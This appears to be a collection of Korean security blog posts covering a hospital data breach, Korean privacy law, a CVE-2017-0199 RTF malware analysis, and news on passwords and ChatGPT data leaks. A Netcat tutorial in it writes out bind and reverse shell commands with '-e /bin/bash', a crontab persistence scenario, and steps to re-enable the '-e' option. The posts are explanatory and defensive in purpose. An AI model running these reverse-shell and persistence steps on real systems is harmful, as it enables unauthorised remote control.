침해 사고 정보
일자 2021/06/05 ~ 2021/06/11
침해 정보 - 환자정보: 병원등록번호, 성명, 생년월일, 성별, 나이, 진료과, 진단명, 검사일, 검사명, 검사결과
- 직원정보: 사번, 성명, 주민번호, 거주지연락처, 연락처, 이메일, 근무부서정보, 직급연차정보, 임용퇴직정보, 휴복직정보, 자격면허정보 등
특징 파일 업로드 취약점을 이용한 웹쉘 업로드로
피해크기 - 약 83만명의 개인정보
> 환자 81만여명
> 전·현직 직원 1만7000여명 
침해 사고 분석
경위 21.05 ~ 21.06 국내·외에 소재한 서버 7대를 장악해 공격 기반 마련
> 국내 4대·해외 3대

② 웹쉘 업로드
> 내부망에서 사용하기 위한 계정 생성
> ID/PW : default/다치지 말라

③ 공유폴더와 연결된 서울대병원 내부망에 침입

④ 병리검사 서버에서 개인정보 탈취
> 81만명의 진료정보를 탈취

⑤ 내부망 전자사보DB에서 개인정보 탈취
> 1만 7000여명의 직원정보 탈취
> 이중 2000명의 정보는 실제 유출된 것으로 확인
원인 ① 파일 업로드가 가능한 병원 내부망의 보안 취약점을 활용
> 웹서버에 명령을 실행해 관리자 권한을 획득할 수 있는 웹쉘이 필터링 되지 않고 업로드 됨
조치 ① 21.07.06 서울대병원 침해 사실 최초 인지 및 공지 게시
- 교육부/보건복지부/개인정보보호위원회/사이버수사대 등에 신고후 조사를 진행
- 서울대병원의 후속조치
> 해당 IP 및 접속 경로 차단
> 서비스 분리
> 취약점 점검 및 보완조치
> 모니터링 강화
> 사용자 PC 비밀번호 변경
> 개인정보보호위원회 등 관련 유관기관 신고
> 병원에 등록된 휴대전화번호로 개인정보 유출 사실 개별 연락 수행

② 23.05.10 경찰청 발표
- 피해기관에 침입 및 정보 유출 수법과 재발 방지를 위한 보안 권고사항을 설명
- 관계기관에 북한 해킹조직의 침입 수법·해킹 도구 등 관련 정보를 제공
> 국가 배후의 조직적 사이버 공격에 대해 치안 역량을 총동원하여 적극적으로 대응
> 관계기관 정보공유 및 협업을 통해 추가적인 피해를 방지
> 사이버 안보를 굳건히 지키기 위해 노력할 계획

- 경찰
> 개인정보보호위원회 의결 결과에 따라 병원 개인정보 보호책임자 입건 여부 검토 예정

③ 23.05.10 개인정보보호위원회
- 전체회의를 통해 서울대학교병원에 과징금 7,475만원 부과 의결
> 서울대병원이 이미 널리 알려진 해킹공격(웹쉘)을 탐지하고, 방어할 관리적·기술적 조치가 미비했다고 판단
> 공공기관 최초로 과징금을 부과
기타 ① 기존 북한발로 확인된 다수 사건과 비교 결과 해당 사건 또한 북한발(김수키, Kimsuky)로 확인
- 기존 사례와 동일한 사항
> 공격 근원지 IP, IP 주소 세탁 기법: 과거 북한 해킹 조직이 사용했던 IP 포함
> 인터넷 사이트 가입정보, 시스템 침입·관리 수법: 해킹용 서버의 사용자 이름·이메일이 과거 북한 해킹조직이 사용한 정보
> 북한어휘 사용: 내부망에 생성한 계정의 비밀번호가 한글 자판으로 '다치지 말라'

② 이승운 경찰청 사이버테러수사대장
- 해킹 조직이 병리검사가 저장됐던 서버를 해킹
- 고위 인사의 개인정보를 빼내기 위한 목적으로 추정

③ 남석 개인정보위 조사조정국장
> 공공기관의 경우 다량의 개인정보를 처리
> 작은 위반행위로도 심각한 피해로 이어질 가능성이 큰 만큼 담당자들의 세심한 주의가 필요

④ 의료 분야 외 다른 분야 또한 주요 정보통신망에 대한 침입 시도가 지속될 것으로 예상
- 최신 보안 업데이트 적용
- 불법적인 접속시도에 대한 접근통제
- 개인정보를 포함한 중요 전산 자료 암호화 등 보안 시스템과 보안정책 강화 권고

 

'침해사고 > 개인정보' 카테고리의 다른 글

유안타증권 개인정보 유출  (0) 2023.07.21
해병대 개인정보 유출  (2) 2023.06.16
인터파크 개인정보 유출  (0) 2023.04.16
한국남부발전 개인정보 유출  (0) 2022.08.31
빗썸 개인정보 유출  (0) 2022.08.24

1. Netcat (nc)

- TCP 또는 UDP를 사용하여 네트워크 연결을 읽거나 기록하는 컴퓨터 네트워킹 유틸리티

- UNIX의 cat과 유사하며, cat 명령으로 파일을 읽거나 쓰듯이 NC는 Network Connection에 읽거나 씀

- 스크립트와 병용하여 network에 대한 debugging, testing tool로써 매우 편리하지만 반면 해킹에서도 자주 사용

 

1.1 주요 옵션

옵션 설명
-l listen 모드로 port 오픈
-L 영구 리스너 생성 (Windows만 작동)
-u Netcat UDP 모드로 전환 (기본값 TCP)
-p local port 지정
-e 연결 후 수행 할 작업
※ 서버에서 -e 옵션 지정 시 서버에서 해당 작업이 수행
 클라이언트에서 -e 옵션 지정 시 클라이언트에서 해당 작업이 수행
-s addr local ip address 지정
-n 호스트 네임과 포트를 숫자로만 입력
-z local ip address 지정
-v verbosity를 증가시키며, 더 많은 정보를 얻을 수 있음
-w secs 시간 종료 값을 정의

 

1.2 바인드쉘

- 일반적인 연결 상태로, 클라이언트가 서버에 접속

- 서버: nc -lnvp 1234 -e /bin/bash
- 클라이언트: nc <서버 IP> 1234

 

[사진 1] 바인드쉘 예시

 

1.3 리버스쉘

- 바인드쉘과 반대로 서버가 클라이언트에 접속, -e 옵션에 의해 클라이언트에서 작업이 수행됨

> 예시의 경우 클라이언트의 /bin/bash가 실행

> 공격자의 PC가 서버가되고, 피해자의 PC가 클라이언트가 되어 명령을 실행

- 서버: nc -lnvp 1234
- 클라이언트: nc <서버 IP> 1234 -e /bin/bash

 

- 일반적으로 방화벽은 네트워크 최상단에 설치되어 외부에서 내부로 들어오는 연결차단

> 반대로 내부에서 외부로 나가는 연결에 대해서는 상대적으로 허용하는 경우가 많음

> 이를 이용해 공격자는 공격 PC를 서버로 동작시킨 뒤, 피해 PC에서 명령 실행 및 공격 PC로 접근해 쉘을 획득

 

- 일반적인 리버스쉘 시나리오는 다음과 같음

① 공격자는 내부 네트워크에 침입한 후 무차별대입공격으로 root 계정 탈취

② 반복적인 침입을 위해 root 계정을 이용해 root 권한을 가지는 일반 사용자 계정 생성

③ netcat 프로그램을 이용한 리버스쉘 연결 작업을 cron table에 등록(/etc/crontab)

④ 공격자는 주기적으로 shell을 획득해 추가 명령 수행

 

[사진 2] 리버스쉘 예시

 

2. -e 옵션

- 앞서 살펴보았듯이 -e 옵션은 연결을 생성한 후 실행할 명령 등의 작업을 지정함

- 침해 상황을 가정해 nc를 통해 리버스쉘 연결을 시도한 결과 -e 옵션이 유효하지 않다고 확인

[사진 3] 유효하지 않은 -e 옵션

 

- 구글링을 해보니 비활성화된 (또는 지원하지 않는) 버전의 nc를 사용한 결과라고 함

> 따라서, -e 옵션을 지원하는 nc 버전 (netcat-traditional)을 설치하고, 해당 버전으로 설정해야 함

# sudo apt-get install -y netcat-traditional
# sudo update-alternatives --config nc

 

- 두 번째 명령 실행 결과를 확인해보면 현재 /bin/nc.openbsd 버전을 사용하고 있는 것으로 확인 됨

> 설치한 netcat-traditional (nc.traditional)으로 변경

[사진 4] sudo update-alternatives --config nc 결과 비교

 

- 변경 후 -e 옵션을 실행하면 정상적으로 리버스쉘이 생성됨

[사진 5] 리버스쉘 생성

1.보호조치 기준 개요

- 개인정보의 안전성 확보조치 기준개인정보의 기술적ㆍ관리적 보호조치 기준으로 구분할 수 있음

구분 개인정보의 안전성 확보조치 기준 개인정보의 기술적ㆍ관리적 보호조치 기준
규제기관 개인정보보호위원회
대상자 개인정보처리자 정보통신서비스 제공자 등
고시 근거 개인정보보호법
- 제23조 제2항 (민감정보의 처리 제한)
- 제24조 제3항 (고유식별정보의 처리 제한)
- 제29조 (안전조치의무)
개인정보보호법
- 제29조 (안전조치의무)
개인정보보호법 시행령
- 제21조 (고유식별정보의 안전성 확보 조치)
- 제30조 (개인정보의 안전성 확보 조치)
개인정보보호법 시행령
- 제48조의2 (개인정보의 안전성 확보 조치에 관한 특례)
처벌 규정 - 안전성 확보에 필요한 조치를 하지 않은 자 (제29조 위반)
- 3천만원 이하 과태료 (제75조 제2항 제6호)
- 안전성 확보에 필요한 조치를 하지 않아서 개인정보가 분실ㆍ도난ㆍ유출ㆍ위조ㆍ변조 또는 훼손당한 자 (제29조 위반)
- 2년 이하의 징역 또는 2천만원 이하 벌금 (제73조 제1항)
- 이용자의 개인정보를 분실ㆍ도난ㆍ유출ㆍ위조ㆍ변조 또는 훼손한 경우로서 제29조의 조치(내부관리계획 수립에 관한 사항 제외)를 하지 않은 자 (제29조 위반)
- 위반행위와 관련한 매출액의 100분의 3 이하 과징금 (제39조의15 제1항 제5호)

 

- 기준별 보호조치 요약

구분 개인정보처리자 정보통신서비스 제공자등
세부기준 개인정보의 안전성 확보조치 기준 개인정보의 기술적ㆍ관리적 보호조치 기준
내부 관리계획의
수립ㆍ시행
1만 명 미만의 정보주체에 관한 개인정보를 보유한 소상공인, 단체, 개인 적용 제외 사업 규모에 따른 예외 규정 없음
접근통제 개인정보처리시스템에 대한 접근권한 부여 등의 내역 기론 보관 의무: 최소 3년간 보관 개인정보처리시스템에 대한 접근권한 부여 등의 내역 기록 보관 의무: 최소 5년간 보관
비밀번호 설정 관련 세부 기준을 명시하지 않음
※ 해설서 기준
- 10자리 이상: 영문 대문자와 소문자, 특수문자, 숫자 중 1종류 이상 조합
- 8자리 이상: 영문 대문자와 소문자, 특수문자, 숫자 중 3종류 이상 조합
개인정보취급자의 비밀번호 작성 규칙을 구체적 명시
- 10자리 이상: 영문, 특수문자, 숫자 중 2종류 이상 조합
- 8자리 이상: 영문, 특수문자, 숫자 중 3종류 이상 조합
외부 인터넷망 차단 의무화 규정 없음 사업자, 개인정보취급자 기준에 해당하는 자의 PC 등에 대한 외부 인터넷망 차단 의무화
고유식별정보의 경우 연 1회 이상 취약점 점검 -
암호화 대상
(개인정보처리시스템
저장 시)
- 비밀번호 (일방향 암호화)
- 고유식별정보
- 비밀번호 (일방향 암호화)
- 고유식별정보
- 신용카드번호
- 계좌번호
접속기록 접속기록 범위: 개인정보취급자 등 계정, 접속일시, 접속지 정보, 처리한 정보주체정보, 수행업무 등 접속기록 범위: 식별자, 접속일시, 접속지를 알 수 있는 정보, 수행업무 등
개인정보 처리시스템 접속기록은 최소 1년 이상 보관
5만 명 이상 정보주체의 개인정보를 처리하거나 고유식별정보 또는 민감정보 처리 개인정보처리시스템의 경우 최소 2년 이상 보관
개인정보 처리시스템 접속기록은 최소 1년 이상 보관
기간통신사업자는 최소 2년 이상 보관

 

- 개인정보의 안전성 확보조치 기준 유형 분류 기준

유형 유형1(완화) 유형2(표준) 유형3(강화)
적용 대상 1만명 미만의 정보주체에 관한 개인정보를 보유한 소상공인, 단체, 개인 - 100만명 미만의 정보주체에 관한 개인정보를 보유한 중소기업
- 10만명 미만의 정보주체에 관한 개인정보를 보유한 대기업, 중견기업, 공공기관
- 1만명 이상의 정보주체에 관한 개인정보를 보유한 소상공인, 단체, 개인
10만명 이상의 정보주체에 관한 개인정보를 보유한 대기업, 중견기업, 공공기관
100만명 이상의 정보주체에 관한 개인정보를 보유한 중소기업, 단체
적용 기준 - 제5조 : 제2항부터 제5항까지
- 제6조 : 제1항, 제3항, 제6항 및 제7항
- 제7조 : 제1항부터 제5항까지, 제7항
- 제8조, 제9조, 제10조, 제11조, 제13조
- 제4조 : 제1항제1호부터 제11호까지 및 제15호, 제3항부터 제4항까지
- 제5조
- 제6조 : 제1항부터 제7항까지
- 제7조 : 제1항부터 제5항까지, 제7항
- 제8조, 제9조, 제10조, 제11조, 제13조
- 제4조부터 제13조까지

 

- 개인정보의 기술적ㆍ관리적 보호조치 기준 적용 대상자

구분 기준이 적용되는 경우
기준
적용
대상자
정보통신
서비스
제공자등
정보통신
서비스
제공자
전기통신
사업자
기간통신사업자
(전기통신사업법 제5조 제2항)
음성․데이터 등의 송․수신, 주파수 할당․제공, 전기통신회선설비임대역무, 기간통신역무제공 등
부가통신사업자
(전기통신사업법 제5조 제3항)
기간통신사업자의 전기통신회선설비를 임차하여 기간통신역무 외의 전기통신역무 제공 등
영리를 목적으로
전기통신사업자의 전기통신역무를 이용해
정보를 제공하거나 매개하는 자
인터넷 홈페이지 등을 운영하는 영리를 목적으로 하는 사업자 등
정보통신서비스 제공자로부터 법 제17조에 따라
이용자의 동의를얻어 개인정보를 제공받은 자
업무제휴 등을 위해 이용자의 동의를 얻어 개인정보를 제공받은 자 등
방송사업자 (개인정보 보호법 제39조의14) 시청자의 개인정보를 수집․이용 또는
제공하는 자 등
(IPTV 사업자는 직접 적용)
수탁자 (개인정보 보호법 제26조) 수탁자는 법 제29조의 기술적․관리적
보호조치 규정을 준용 등
다른 법률에서 이 법의 적용을 받는 자 다른 법률에서 특별히 규정된 때 등

 

참고

 

(개인정보보호위원회)개인정보의안전성확보조치기준

 

www.law.go.kr

 

KISA 한국인터넷진흥원

 

www.kisa.or.kr

 

(개인정보보호위원회)개인정보의기술적·관리적보호조치기준

 

www.law.go.kr

 

KISA 한국인터넷진흥원

 

www.kisa.or.kr

 

 

휴대폰에 업데이트 알람이 떠서 확인해보니 보안 대응 업데이트 였다. 조금 찾아봤더니 작년 iOS16 공개와 함께 처음 선보였다고 한다. 정규 업데이트와는 별개로, 장치와 소프트웨어의 보안 문제를 개선 또는 수정하는 내용을 담고 있다고 한다. 그래서 그런지 업데이트 크기가 약 100MB 였고, 순식간에 완료가 되었다.

 

사파리 웹 브라우저와 Webkit 프레임 워크 스택 또는 기타 중요한 시스템 라이브러리에 대한 개선 사항이 업데이트되는 것이라고 한다. 또한 악용되었거나 존재한다고 보고된 문제 등 일부 보안 문제를 더 빠르게 완화하는 데에도 사용할 수 있다고 한다.

 

설정 > 소프트웨어 업데이트 > 자동 업데이트 > 보안 대응 및 시스템 파일에서 비활성화할 수 있다. 하지만, 보안과 개인정보를 안전하게 유지하기 위해서는 해당 기능을 활성화하고, 주기적으로 업데이트를 확인하고 적용하는 것이 필요할 것 같다. 또한, 취지에서도 알 수 있듯이 소프트웨어 업데이트 사이에 중요한 보안 개선 사항을 설치하는 기능인만큼 활성화해 두는 것이 좋을 것 같다.

1. 분석 도구

1.1 Virus Total [1]

- 무료로 파일 검사를 제공하는 웹사이트로, 파일, URL 내의 바이러스를 검사해주는 사이트 (IP 조회도 가능)

 

1.2 HxD [2]

- 파일에 저장된 HEX(16진수) 값을 읽고 수정하는데 이용

 

1.3 rtfdump.py [3][4]

- Github에서 다운받을 수 있는 파이썬으로 작성된 RTF 파일을 분석하는데 사용되는 Open Source

 

1.4 oledump.py [8]

- OLE 파일을 분석하는 프로그램

 

2. 분석

 Virus Total 조회

- 실습에서 진행한 RTF 파일을 Virus Total에서 조회한 결과는 다음과 같음

> 58개의 벤더사 중 39개의 벤더사가 악성 파일로 탐지

> 탐지명을 확인해보면 CVE-2017-0199와 관련된 것임을 알 수 있음

[사진 1] Virus Total 조회 결과

 

② 파일 속성 및 HxD 조회

- 파일 속성과 HxD 확인 결과 해당 파일이 RTF 파일임을 확인

> RTF 파일은 파일 시그니처7B 5C 72 74 66 31 ({rtf1)를 가짐 [5]

[사진 2] 파일 속성 및 HxD 확인 결과

 

③ rtfdump.py 파일 덤프

- 먼저 -m 옵션을 사용해 rtfdump.py의 사용법에 대해 확인

[사진 3] rtfdump.py -m 결과

 

- yeahhub.rtf 파일 덤프 결과 문서에 포함된 객체들이 조회됨

> [사진 5]를 통해 RTF 문서에서 원격 객체와 연결을 하기위해 "objautlink"를 사용하며, 그 중 "objdata"에 OLE 객체를 포함하고 있는것을 확인 [6]

> objautlink ⊃ objdata ⊃ OLE 객체로 정리함

※ [사진 4]에서 첫 번째 열의 숫자는 rtfdump에서 파생된 출력 값으로 파일의 일부가 아님

[사진 4] objdata

 

[사진 5] RTF 내 objdata 객체

 

- 분석 후 추가 구글링 결과 rtfdump.py의 경우 아래 명령으로 문서에 포함된 OLE 객체를 찾을 수 있다고 확인됨

rtfdump.py -f O 파일명

 

- [사진 4]에서 확인된 objdata의 값을 -s 옵션으로 확인한 결과 "01050000 02000000"이 확인

> "01050000 02000000"는 각각 01050000 OLE 버전 정보, 02000000 임베디드 객체를 뜻함 [7]

> -H 명령을 추가해 확인하면 더욱 명확히 OLE 객체임을 알 수 있음

[사진 6] -s 10 명령 결과

 

[사진 7] -H 추가 결과

 

④ oledump.py

- [사진 7]의 결과에서 두 가지 옵션 추가 및 "|"를 사용해 oledump.py의 입력으로 전달

> -E: 포함된 객체 덤프

> -d: 출력된 내용 덤프

[사진 8]에서 첫 번째 열의 숫자는 oledump에서 파생된 출력 값으로 파일의 일부가 아님

[사진 8] 덤프 파일 출력

 

- -s 옵션으로 각각의 스트림을 확인한 결과 첫 번째 스트림에서 악성 URL 확인

[사진 9] 문자 스트림 출력

 

- [사진 9]에서 확인된 악성 URL로 HTA 파일을 요청하고, HTA 파일에 포함된 리버스쉘 생성 명령이 실행

[사진 10] 패킷 일부

 

3. 참고

[1] https://www.virustotal.com/gui/home/upload
[2] https://mh-nexus.de/en/hxd/
[3] https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py
[4] https://blog.didierstevens.com/2016/07/29/releasing-rtfdump-py/
[5] http://forensic-proof.com/archives/300
[6] https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/
[7] https://github.com/houjingyi233/office-exploit-case-study/blob/master/CVE-2017-11882%26CVE-2018-0802%26CVE-2018-0798/cve-2018-0802%20poc%20with%20comments.rtf
[8] https://github.com/DidierStevens/DidierStevensSuite/blob/master/oledump.py

요약 - 매해 5월 첫째주 목요일은 세계 패스워드의 날(World Password Day)
※ 세계 패스워드의 날: 전세계적으로 올바른 암호 보안의 중요성을 알리고 강력한 패스워드를 통한 보안 강화를 독려하기 위해 기념
- 패스워드 관리는 여전히 허술하며, 보안규정이 있지만 제대로 관리되지 못하고 있는 실정
내용 - 현 패스워드에는 여러 문제점이 있으며 좀더 효율적인 패스워드 관리가 필요
> 아이디와 암호를 입력 시: 누군가가 엿볼 수 있음
> 특정 주기마다 암호 변경: 책상 위에 적어 놓거나 기억하기 번호를 사용해 변경 의미 없음
> 사용하는 서비스 마다 동일한 비밀번호 사용: 하나의 비밀번호 탈취 시 모든 서비스에 영향
> 비밀번호 공유 : 동료 등에게 암호를 알려주다 보면 규정을 준수하기조차 쉽지 않음

- 관련 사례
① 구글 ‘패스키(passkeys)’ 기술을 출시 발표
> 컴퓨터와 휴대전화 등에서 비밀번호를 입력하지 않아도 관련 앱이나 사이트를 이용할 수 있음
※ 계정 이용자가 패스키를 사용하면 구글은 로그인을 위한 암호 또는 로그인 후 2단계 인증을 요구하지 않음
> 앱이나 사이트 등에 비밀번호를 입력하지 않고, 얼굴 인식·지문·화면 잠금 개인 식별번호(PIN) 등을 이용해 로그인할 수 있는 기술
 보안을 위해 공유 기기에 패스키를 생성해서는 안 된다고 강조
> 기존의 비밀번호의 위험(피싱 공격, 해킹 등)으로부터, 안전하며, 클라우드를 통해 모든 기기에서 사용자 인증이 동기화 됨
> 22.09 애플은 운영체제(iOS)에 패스키 지원 기능을 지원
> 22.10 페이팔도 iOS에서 패스키를 지원

② 오토패스워드
> 사용자가 아이디를 입력하면 사용자를 대신해 자동으로 비밀번호 입력
> 사용자는 휴대폰 등을 사용해 비밀번호가 올바르게 입력 되었는지 확인 후 로그인
> 일회용 패스워드 기술을 이용하였으며, 비밀번호가 매번 새롭게 생성되 도용될 수 없고, 암기 불필요
> 자동으로 입력된 비밀번호와 휴대폰 등에서 확인한 비밀번호 비교를 통해 서비스 및 사용자 인증 진행

③ MFA, 생체인증 등
> MFA(멀티 팩터 인증) 푸시 알림을 계속 보내 상대방을 지치게 만들어 우발적으로 로그인 승인 버튼을 누르게 만드는 공격 (MFA 피로 공격_MFA Fatigue Attacks) 등 문제 존재
> 안면 인식, 지문 기반 인증 등의 생체인증 또한 오류가 존재
기타 - 자동화된 통합 관리 솔루션 필요
> 단일 디지털 아이덴티티를 통해 적절한 사용자에게 적절한 수준의 액세스가 할당되도록 보장되어야 함
> 직원과 비직원 모두의 액세스 수준을 제어하여 조직 전체에 대한 가시성을 확보하고, 권한이 부여되지 않은 정보나 시스템에 액세스하려는 불법적인 시도를 사전에 차단

- 궁극적으로 기업은 사물인터넷(IoT) 및 로봇프로세스자동화(RPA) 기술에 대한 의존도 증가와 디지털 업무 환경의 성장에 힘입어 폭발적으로 증가하는 디지털 아이덴티티들을 관리
> 기업이 전반적인 사이버 보안 태세를 강화하고 비밀번호 관련 위협을 방지하려면 결국은 통합된 아이덴티티 관리가 관건

 

보안뉴스

 

오늘은 ‘세계 패스워드의 날’... 하지만 패스워드 관리는 여전히 ‘허술’

매해 5월 첫째주 목요일은 ‘세계 패스워드의 날(World Password Day)’로, 올해는 5월 4일이다. 세계 패스워드의 날은 전세계적으로 올바른 암호 보안의 중요성을 알리고 강력한 패스워드를 통한 보

www.boannews.com

 

"비밀번호 필요없다"…구글 새 로그인 방식 도입

[서울=뉴시스]한휘연 인턴 기자 = 비밀번호 없이 새로운 방식으로 구글 계정 로그인이 가능하게 됐다

www.newsis.com

 

세일포인트 “5월4일은 세계 비밀번호의 날··· 통합 아이덴티티 관리 중요”

...

www.ddaily.co.kr

 

요약 - 챗GPT를 업무에 활용하기 시작하면서 각종 민감 정보를 입력한다는 지적
- 챗GTP를 활용 중 개인정보, 고객 정보가 노출되지 않도록 막아주는 프라이빗 챗GPT(PrivateGPT) 등장
내용 - 프라이빗AI(Private AI)社에서 오픈AI(OpenAI)의 챗GPT를 기반으로 프라이빗GPT 개발
> 사용자와 AI 중간에 위치해 사용자 입력에서 민감정보를 지워낸 후 AI의 응답에 다시 사용자가 입력한 민감정보를 대입
> 민감정보: 의료, 신용카드, 연락처, 생년월일, 주민등록번호 등

- 마이크로소프트(MS) 또한 기업 내부 데이터 유출을 우려하지 않아도 되는 '프라이빗 챗GPT' 계획 발표
> 데이터를 별도 공간에 보관하는 기업 전용 클라우드 서비스를 출시할 예정
> 애저클라우드에 다른 고객과 격리된 전용 서버에서 챗GPT를 실행하도록 해 데이터가 공유되거나 유출되는 것을 원천 차단하겠다는 것
> 가격은 일반 챗GPT 버전에 비해 최대 10배에 달할 것

- 오픈AI는 챗GPT를 이용자의 채팅 내용을 외부에 노출하지 않는 '비공개 모드' 출시
> 사용자가 공개 여부를 선택하도록 한 기능

- 사용자가 데이터를 챗GPT 창에 입력할 때, 그 데이터는 대형 언어 모델(LLM)의 데이터셋에 포함 됨
> 차세대 챗GPT 혹은 다른 인공지능 알고리즘을 훈련시키는 데 활용
> 미래 어느 시점에 추출하는 것이 가능하므로, 훈련용 데이터 혹은 사용자가 입력하는 데이터에 대한 안전 장치 마련 필요
※ 오픈AI(OpenAI)는 챗GPT에 입력된 질문 내용을 임직원이 확인하고 학습 데이터로 활용

- 관련 사례
① 23.03 사용자가 챗GPT와 나눈 대화 주제 이력 노출
> 챗GPT와 사용자 간 대화는 사용자가 나중에 다시 열람할 수 있게 목록화돼 표시창에 저장
> 자신의 대화 목록이 아닌 타인의 대화 목록이 노출
※ 대화 내용은 노출되지 않았고, 표시창에 저장된 대화 주제 이력이 노출된 것이며, 누구의 목록인지 드러나지 않음
> 23.03.20 오픈AI는 챗GPT 서비스를 일시 종료하고, 같은 날 오후 늦은 시간에 대화 기록 표시창을 막아 놓은 채 서비스를 재개
※ 익명의 오픈 소스 소프트웨어의 오류로 인해 문제가 발생

② 23.03 삼성전자 디바이스솔루션(DS·반도체) 부문의 기업 정보가 챗GPT를 통해 정보 유출
> 챗GPT에 삼성전자 기업 정보를 입력하는 3건의 사고가 난 것으로 확인
※ 설비정보 유출 2건, 회의내용 유출 1건
※ 챗GPT 사용을 허가하며 임직원을 대상으로 “사내 정보 보안에 주의하고 사적인 내용을 입력하지 말라”는 공지 전달
> 해당 사실을 인지한 후 한 질문당 업로드 용량을 1024바이트로 제한하는 등 ‘긴급 조치’ 사항을 적용
※ 유출 사고를 낸 임직원을 대상으로 사고의 경위를 조사하고, 필요시 징계를 내릴 방침
⒜ 사고1: DB 다운로드 프로그램의 소스 코드 실행 중 오류 -> 문제가 된 소스 코드 전부를 복사 -> 챗GPT 입력, 해결 방법 문의
⒝ 사고2: 수율, 불량 설비 파악을 위한 프로그램 코드를 챗GPT에 입력
⒞ 사고3: 녹음한 회의 내용을 문서 파일로 변환한 뒤 챗GPT에 입력

③ 기타
> 임원A는 기업 전체의 전략이 담긴 문서를 통째로 챗GPT에 입력한 후 파워포인트로 변환 요청
> 의사A는 환자의 이름과 의료 기록을 챗GPT에 입력한 후 보험사에 보낼 서신 작성 요청
기타 - 챗GPT를 사용할 때 기본 보안 수칙을 완전히 잊는 듯한 사용자들이 여전히 많은 상황
> 사이버페이븐(Cyberhaven)社 보고서
① 민감한 데이터를 챗GPT에 입력하려는 사용자들이 4.2% 
② 챗GPT에 붙여 넣는 내용 가운데 민감한 정보가 11%를 차지
> 자동으로 녹취록을 작성해 주는 인공지능 서비스인 오터(Otter.ai): 인공지능이 식별한 화자와 중요하다고 표시한 문장, 태깅된 단어와 같은 정보를 내부에 보관
> API를 통해 챗GPT를 자신들의 서비스에 직접 접목하기 시작 - 더 많은 데이터가 LLM으로 유입

- 21.06 ‘훈련 데이터 추출 공격(training data extraction attack)’이라는 기법이라는 걸 개발해 논문으로 발표
> 애플, 구글, 하버드대학, 스탠포드대학 등의 연구원들은 공동 연구
> 인공지능 모델을 훈련시키는 데이터를 추출하여 개인 식별 정보 등 민감 정보를 빼내는 데 성공했던 것

- 인공지능 사용과 관련된 가이드라인을 만들어 교육해야 할 필요
> 직원들이 챗GPT에 제출하는 데이터를 파악하고 통제하는 일이 만만치 않다고 경고
> 조직들은 기밀 데이터 처리에 적합한 애플리케이션들이 잘 문서화되도록 정보보호정책을 업데이트해야 함
> 문서화가 잘 되어 있고 충분한 정보를 바탕으로 수립된 정책이 그런 정보 흐름 통제의 시작점
> 신중하게 이런 새로운 기술을 비즈니스 개선에 활용할 수 있는 방법을 탐구

 

보안뉴스

 

챗GPT 프롬프트 통한 민감 정보 유출 막기 위해 등장한 프라이빗GPT

직원들이 챗GPT를 업무에 활용한답시고 각종 민감 정보를 마구 입력하고 있다는 지적이 기업들 사이에서 나오고 있다. 그런 가운데 한 데이터 프라이버시 전문 기업이 이러한 위험으로부터 기업

www.boannews.com

 

MS, '프라이빗 챗GPT' 출시한다 - AI타임스

마이크로소프트(MS)가 기업 내부 데이터 유출을 우려하지 않아도 되는 \'프라이빗 챗GPT\'를 내놓는다.디인포메이션은 2일(현지시간) MS 내부 사정에 정통한 소식통을 인용해 MS가 상반기 중에 기업

www.aitimes.com

 

챗GPT 버그 공포…내 질문 목록을 남들이 봤다 | 중앙일보

챗GPT와 사용자 간 대화는 사용자가 나중에 다시 열람할 수 있게 목록화돼 표시창에 저장되는데, 이 중국어 대화 목록은 자신의 것이 아니라고 했다. 오픈AI의 최고경영자(CEO) 샘 알트먼은 22일 자

www.joongang.co.kr

 

[단독] 우려가 현실로…삼성전자, 챗GPT 빗장 풀자마자 ‘오남용’ 속출

우려가 현실이 됐다.삼성전자가 디바이스솔루션(DS·반도체) 부문 사업장 내 챗GPT(ChatGPT) 사용을 허가하자마자 기업 정보가 유출되는 사고가 났다.

economist.co.kr

 

챗GPT 사용해 업무 능력 향상하려다 민감한 정보와 기밀까지 입력해

챗GPT로 인해 새로운 위협이 불거지고 있다는 지적이 나왔다. 챗GPT 열풍이 대형 언어 모델(Large Language Model, LLM)이라는 기술 자체에 대한 관심의 급증으로 이어졌는데, 수많은 사용자들이 이 기술

www.boannews.com

 

기업 민감 데이터를 ChatGPT에 입력해도 될까

오픈AI의 챗봇인 챗GPT의 잠재력과 유용성이 계속 대서특필되고 있다. 하지만 보안 분야는 민감한 비즈니스 데이터를 챗GPT에 입력하면 조직들이

www.itworld.co.kr

 

지난달 14일, 22일에 한국인터넷진흥원 침해센터에 문의한 내용에대한 답변을 받았다. 결론부터 말하면 해당 사안의 경우 개인정보호법 제29조 안전조치의무를 위반하는 행위에 속한다는 것이다. 처음 문의를 할 때, 문의 내용과 관련된 사례를 찾아보았고, 이미 문의 내용이 개인정보보호법을 위반한 것이라고 생각했다.

 

개인정보보호법에서는 제29조 안전조치의무 위반에 대한 벌금과 과태료를 규정하고 있다.

 

제73조(벌칙) 다음 각 호의 어느 하나에 해당하는 자는 2년 이하의 징역 또는 2천만원 이하의 벌금에 처한다.
1. 제23조제2항, 제24조제3항, 제25조제6항, 제28조의4제1항 또는 제29조를 위반하여 안전성 확보에 필요한 조치를 하지 아니하여 개인정보를 분실ㆍ도난ㆍ유출ㆍ위조ㆍ변조 또는 훼손당한 자

제75조(과태료) ① 다음 각 호의 어느 하나에 해당하는 자에게는 5천만원 이하의 과태료를 부과한다.
6. 제23조제2항, 제24조제3항, 제25조제6항, 제28조의4제1항 또는 제29조를 위반하여 안전성 확보에 필요한 조치를 하지 아니한 자

 

개인정보보호법에서는 법 위반에 따른 제재 또는 처벌로 벌금, 과징금, 과태료를 규정하고 있으며, 각각의 특징을 정리하면 다음과 같다. 벌금의 경우 전과기록이 남고, 과태료와 과징금의 경우 의무위반에 따른 금전적인 벌이기 때문에, 처벌의 무게는 벌금 > 과태료 = 과징금인것 같다.

 

① 벌금

- 과태료, 과징금에 비해 가장 강력한 재산형

- 법을 어긴 경우 적용되는 형벌이며, 형벌 중 금전적인 벌에 해당

- 형사처분이므로 벌금형을 받을 경우 전과기록이 남음

 

② 과태료

- 행정법상 의무위반에 대한 제재로 부과되는 금전적인 벌

- 이익 여부와 상관없이 행정상 질서를 유지하기 위해 내리는 징계

- 행정처분이므로 전과기록이 남지 않음

 

③ 과징금

- 행정법상 의무위반에 대한 제재로 부과되는 금전적인 벌

- 주로 불법으로 얻은 경제적 이익을 환수하기 위해 처분

- 행정 제재와 부당 이득 환수라는 두 가지 성격을 가짐

